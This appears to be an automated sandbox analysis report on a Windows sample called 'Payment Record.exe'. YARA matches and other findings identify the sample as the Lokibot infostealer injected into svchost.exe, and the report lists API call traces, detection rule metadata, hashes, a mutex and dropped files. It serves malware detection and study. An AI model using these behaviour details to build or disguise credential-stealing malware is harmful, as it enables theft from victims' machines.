Code function: 0_2_00713F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00713F66

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_0070001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0070001C

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_0072CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0072CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: Payment Record.exe PID: 5952, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 320, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: This is a third-party compiled AutoIt script.	0_2_006A3B3A
Source: Payment Record.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Payment Record.exe, 00000000.00000000.2117000833.0000000000754000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5f49dfab-e
Source: Payment Record.exe, 00000000.00000000.2117000833.0000000000754000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_2cbebea5-6
Source: Payment Record.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_df345b76-5
Source: Payment Record.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_80effbae-5

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment Record.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A73540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	2_2_00A73540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A733C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	2_2_00A733C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A72720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	2_2_00A72720

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_0070A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0070A1EF

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006F8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_006F8310

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_007051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_007051BD

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006CD975	0_2_006CD975
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006C21C5	0_2_006C21C5
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006D62D2	0_2_006D62D2
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_007203DA	0_2_007203DA
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006D242E	0_2_006D242E
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006C25FA	0_2_006C25FA
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006FE616	0_2_006FE616
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006B66E1	0_2_006B66E1
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006AE6A0	0_2_006AE6A0
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006D878F	0_2_006D878F
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_00720857	0_2_00720857
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006D6844	0_2_006D6844
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006B8808	0_2_006B8808
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_00708889	0_2_00708889
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006CCB21	0_2_006CCB21
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006D6DB6	0_2_006D6DB6
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006B6F9E	0_2_006B6F9E
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006B3030	0_2_006B3030
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006CF1D9	0_2_006CF1D9
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006C3187	0_2_006C3187
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006A1287	0_2_006A1287
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006C1484	0_2_006C1484
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006B5520	0_2_006B5520
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006C7696	0_2_006C7696
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006B5760	0_2_006B5760
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006C1978	0_2_006C1978
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006D9AB5	0_2_006D9AB5
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006AFCE0	0_2_006AFCE0
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_00727DDB	0_2_00727DDB
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006CBDA6	0_2_006CBDA6
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006C1D90	0_2_006C1D90
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006ADF00	0_2_006ADF00
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006B3FE0	0_2_006B3FE0
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_0108489C	0_2_0108489C
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_010E1898	0_2_010E1898
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_01081DD4	0_2_01081DD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004029D4	2_2_004029D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00A72720	2_2_00A72720

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: String function: 006C8900 appears 42 times
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: String function: 006A7DE1 appears 36 times
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: String function: 006C0AE3 appears 70 times

Source: Payment Record.exe, 00000000.00000003.2127817599.0000000003C4D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Record.exe
Source: Payment Record.exe, 00000000.00000003.2127326000.0000000003AA3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Record.exe

Source: Payment Record.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Payment Record.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Payment Record.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: Payment Record.exe PID: 5952, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 320, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@1/1

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_0070A06A GetLastError,FormatMessageW,

0_2_0070A06A

Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006F81CB AdjustTokenPrivileges,CloseHandle,	0_2_006F81CB
Source: C:\Users\user\Desktop\Payment Record.exe	Code function: 0_2_006F87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_006F87E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	2_2_0040650A

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_0070B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0070B333

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_0071EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0071EE0D

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_007183BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_007183BB

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_006A4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_006A4E89

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00A73360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00A73360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00A73360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00A73360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\Payment Record.exe

File created: C:\Users\user\AppData\Local\Temp\autC98E.tmp

Jump to behavior

Source: Payment Record.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Payment Record.exe

